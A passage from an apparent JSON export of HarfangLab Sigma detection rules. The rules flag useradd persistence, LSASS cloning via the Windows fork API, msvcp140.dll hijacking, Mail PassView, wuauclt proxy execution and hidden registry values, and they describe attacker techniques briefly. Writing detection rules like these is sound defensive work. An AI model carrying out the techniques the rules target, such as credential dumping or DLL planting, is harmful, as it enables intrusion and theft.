'/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_edutice:\n # useradd -p -s /bin/bash -b /home/external -g edutice-external -m --badname\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessGrandparentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/podman'\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3",
"rule_name": "User Created via useradd",
"rule_description": "Detects an attempt to create a new user using the useradd utility.\nAdversaries may create new users to hide their activity or achieve persistence.\nIt is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00ff5814-36a0-4bb9-8426-599b30b414a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094659Z",
"creation_date": "2026-03-23T11:45:34.094661Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094665Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Dirty-Vanity",
"https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1003_001_lsass_clone_using_process_reflection.yml",
"content": "title: Possible LSASS Reflection via Windows Fork API\nid: 00ff5814-36a0-4bb9-8426-599b30b414a1\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00ff5814-36a0-4bb9-8426-599b30b414a1",
"rule_name": "Possible LSASS Reflection via Windows Fork API",
"rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to investigate the process that performed this action to determine its legitimacy.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01198d94-cc61-455c-9bd1-37096dd366f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623301Z",
"creation_date": "2026-03-23T11:45:34.623303Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_unsigned_msvcp140.yml",
"content": "title: Unsigned msvcp140.dll DLL Loaded\nid: 01198d94-cc61-455c-9bd1-37096dd366f1\ndescription: |\n Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\msvcp140.dll'\n sha256|contains: '?' 
# at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n\n filter_commonfolders:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\msvcp140.dll'\n - '?:\\Windows\\syswow64\\msvcp140.dll'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_known_sha256:\n sha256:\n - '1e57a6df9e3742e31a1c6d9bff81ebeeae8a7de3b45a26e5079d5e1cce54cd98'\n - 'f7ba518cb961853ec35c7bb159054983fc006fdfbb6b1c360720eb52fefb3d38'\n - 'b7278da3da769bff80ecf19d0f36ad1716da7f6c77f625c08d185ad302b200d0'\n - 'ef27a68bdc1ee3d5d9a6a720b656bfb7604a8fac6aceb245a6eadc2788686d9f'\n - '557d76338488e28c7761dfe5ee4fa722f65f0c945563002e86de09c95f02b2aa'\n - '75fc76655631a4ae72d015b8e85f899537c603661ca35a3f29099b8e4c84716c'\n - '74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823'\n - '87a9e61e428632177c0292390d125da8e5c996cc0d1d619045ee041ce3bd9147'\n - '9e16ea4679e3c5780b2fdeea251e258bef968631137a40f93fcad6ee551108df'\n - 'd3151f653af88d88994dd66e30e3a184ba347e57a7c3ca909c2a9d4b5b6084fc'\n - '875f236424f59a82c9311930097c7e6073242fee66a60c38eec79b827d6e924c'\n - '006a73b6c5b31cc85974873a694e81e3d213ec493323b04607bcdaba0d6115eb'\n - '85aa8c8ab4cbf1ff9ae5c7bde1bf6da2e18a570e36e2d870b88536b8658c5ba8'\n - '115327d2c7fe87aa39a32bf3fd27e3cff32b9f4bb80f31e426b30148820aa220'\n - 'b9e8377a03ef104122a416f968b05133739f2f2a6c4b83c190723d7d780ebad3'\n - 'c09b126e7d4c1e6efb3ffcda2358252ce37383572c78e56ca97497a7f7c793e4'\n - '65ee0e7864cc6b2d8fd81b4cdf32bc900b74fdf04149587a8987f11f57966c86'\n - 'e7f59bc871613f960e61aa111ceb2f6de0650f79878d9e2141c646a51bdf97b0'\n - '8bd47bbc5cf773fa44ba38a20dbd3353970353cb99eda9238e4af92383fab8f9'\n\n filter_knownimphash:\n Imphash:\n - '2ba11fd5a511c8a409e705e9ab6b5dc1'\n - 'adf99b9ea3a1f76c33522f96772bc4dd'\n - 'a14a54183892ac75415d5e2bb2ac7208'\n - '01c801a34c4715440ef1f25ad689b315'\n - '54c174302c3213f3e59e692f8b5c58e5'\n - 
'f2d585ff96afa3a77e09f5b37e7b3230'\n - 'c0e775d13a8146396b3de4dc441694a7'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_spool:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\msvcp140.dll'\n\n exclusion_java: # too many java process with unpredictable name..\n ImageLoaded|endswith: '\\bin\\msvcp140.dll'\n\n exclusion_zotero:\n ProcessImage|endswith: '\\Zotero*\\zotero.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Zotero\\msvcp140.dll'\n\n exclusion_ideashare:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShare.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShareService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\IdeaShareService.exe'\n - '?:\\ProgramData\\IdeaShare\\IdeaShare.exe'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\msvcp140.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\msvcp140.dll'\n - '?:\\ProgramData\\IdeaShare\\msvcp140.dll'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_teams:\n - ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\msvcp140.dll'\n - ProcessName: 'regsvr32.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\\\*\\\\*\\msvcp140.dll'\n\n exclusion_onedrive:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\Microsoft.SharePoint.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileSyncConfig.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileCoAuth.exe'\n - 
'?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\OneDriveLauncher.exe'\n\n exclusion_sap:\n ProcessImage|endswith: '\\DATA_UNITS\\CrystalReports\\setup.engine\\actionagentproc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_sonix:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k Camera -s FrameServer'\n ImageLoaded: '?:\\Windows\\System32\\SONiX\\msvcp140.dll'\n\n exclusion_cisco:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\wmlhost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01198d94-cc61-455c-9bd1-37096dd366f1",
"rule_name": "Unsigned msvcp140.dll DLL Loaded",
"rule_description": "Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2026-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01474426-6a8b-4834-9f6f-54b7c359a027",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077917Z",
"creation_date": "2026-03-23T11:45:34.077919Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077924Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.nirsoft.net/utils/mailpv.html",
"https://attack.mitre.org/techniques/T1555/"
],
"name": "t1555_mail_passview_execution.yml",
"content": "title: Mail PassView Execution\nid: 01474426-6a8b-4834-9f6f-54b7c359a027\ndescription: |\n Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\n It can be used by attackers to retrieve mail passwords from an infected host.\n It is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\nreferences:\n - https://www.nirsoft.net/utils/mailpv.html\n - https://attack.mitre.org/techniques/T1555/\ndate: 2025/10/31\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.MailPassView\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\mailpv.exe'\n # No OriginalFilename, we have to rely on another PE field\n # The two spaces are intentional\n - Product: 'Email Password-Recovery'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01474426-6a8b-4834-9f6f-54b7c359a027",
"rule_name": "Mail PassView Execution",
"rule_description": "Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\nIt can be used by attackers to retrieve mail passwords from an infected host.\nIt is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\n",
"rule_creation_date": "2025-10-31",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "016b5935-600b-4242-91e1-e727c9410d11",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070359Z",
"creation_date": "2026-03-23T11:45:34.070361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070365Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_wuauctl.yml",
"content": "title: Proxy Execution via Wuauclt\nid: 016b5935-600b-4242-91e1-e727c9410d11\ndescription: |\n Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\n Malicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\n It is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/11/17\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'UpdateDeploymentProvider'\n - 'RunHandlerComServer'\n\n exclusion_legitimate:\n CommandLine|contains:\n - ' UpdateDeploymentProvider.dll '\n - ' wuaueng.dll '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "016b5935-600b-4242-91e1-e727c9410d11",
"rule_name": "Proxy Execution via Wuauclt",
"rule_description": "Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\nMalicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\nIt is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01833e69-127a-4ff4-a998-d4decbae548f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069505Z",
"creation_date": "2026-03-23T11:45:34.069507Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069512Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_hidden_registry_data_space.yml",
"content": "title: Possible Hidden Registry Data Created\nid: 01833e69-127a-4ff4-a998-d4decbae548f\ndescription: |\n Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\n Adversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\n It is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2021/10/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details|startswith: ' '\n\n # Some softwares set values containing only a random number of spaces\n exclusion_all_spaces:\n Details|startswith: ' '\n Details|endswith: ' '\n\n exclusion_image:\n Image:\n - '?:\\Program Files (x86)\\Avid\\iNEWS*\\ANWS.exe'\n - '?:\\Windows\\System32\\drivers\\Intel\\ICPS\\IntelConnect.exe'\n - '?:\\Program Files\\Photon Engineering\\FRED *\\Bin\\Fred.exe'\n - '?:\\Program Files (x86)\\Thermo\\Avantage\\Bin\\Avantage.exe'\n - '?:\\program files\\thermo scientific\\avantage\\bin\\avantage.exe'\n\n exclusion_commandline:\n Image: '?:\\windows\\system32\\regsvr32.exe'\n ProcessCommandLine:\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun_??????.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\vgchargecompensation.ocx'\n\n exclusion_tiworker:\n Image|endswith: '\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - 
':\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n - '\\TiWorker.exe'\n - '\\Sources\\SetupPrep.exe'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n Details|contains|all:\n - 'PlugInConfiguration'\n - 'PublicKeyToken'\n - 'MaxConcurrentCommandsPerShell'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n TargetObject|endswith:\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsPrev\\cWin0\\cTab*\\tfilename'\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsCurrent\\cWin0\\cTab*\\tfilename'\n # - '\\SOFTWARE\\Adobe\\Acrobat Reader\\2017\\AVGeneral\\cRecentFiles\\c8\\tFileName'\n - '\\SOFTWARE\\Adobe\\Acrobat Reader\\\\*\\tfilename'\n - '\\SOFTWARE\\Adobe\\Adobe Acrobat\\\\*\\tfilename'\n\n exclusion_jalios:\n Image: '?:\\Program Files (x86)\\Jalios\\Jalios JDrive\\srm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JALIOS'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_setuphost:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n TargetObject:\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved\\{????????-????-????-????-????????????}'\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Classes\\CLSID\\{????????-????-????-????-????????????}\\(Default)'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_wsman:\n Image: '?:\\Windows\\System32\\WSManHTTPConfig.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n TargetObject: 
'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Migration\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n\n exclusion_sap:\n Image:\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe'\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPGUI\\saplgpad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_pdf_architect:\n Image: '?:\\Program Files\\PDF Architect ?\\architect.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'pdfforge GmbH'\n\n exclusion_smbios2reg:\n Image|endswith: '\\BeetleInfo\\Smbios2Reg.exe'\n ProcessOriginalFileName: 'Smbios2Reg.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Wincor Nixdorf\\BeetleInfo SensorService\\DMI\\Mainboard'\n\n exclusion_notepad:\n Image:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Notepad\\\\*String'\n\n exclusion_ssms:\n Image: '?:\\Program Files (x86)\\Microsoft SQL Server Management Studio *\\Common7\\IDE\\Ssms.exe'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find'\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find *'\n\n exclusion_softerra:\n Image|endswith: '\\ldapbrowser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Softerra, Ltd.'\n TargetObject|endswith: '\\SOFTWARE\\Softerra\\LDAP Browser *\\Settings\\QuickSearchBar\\\\*'\n\n 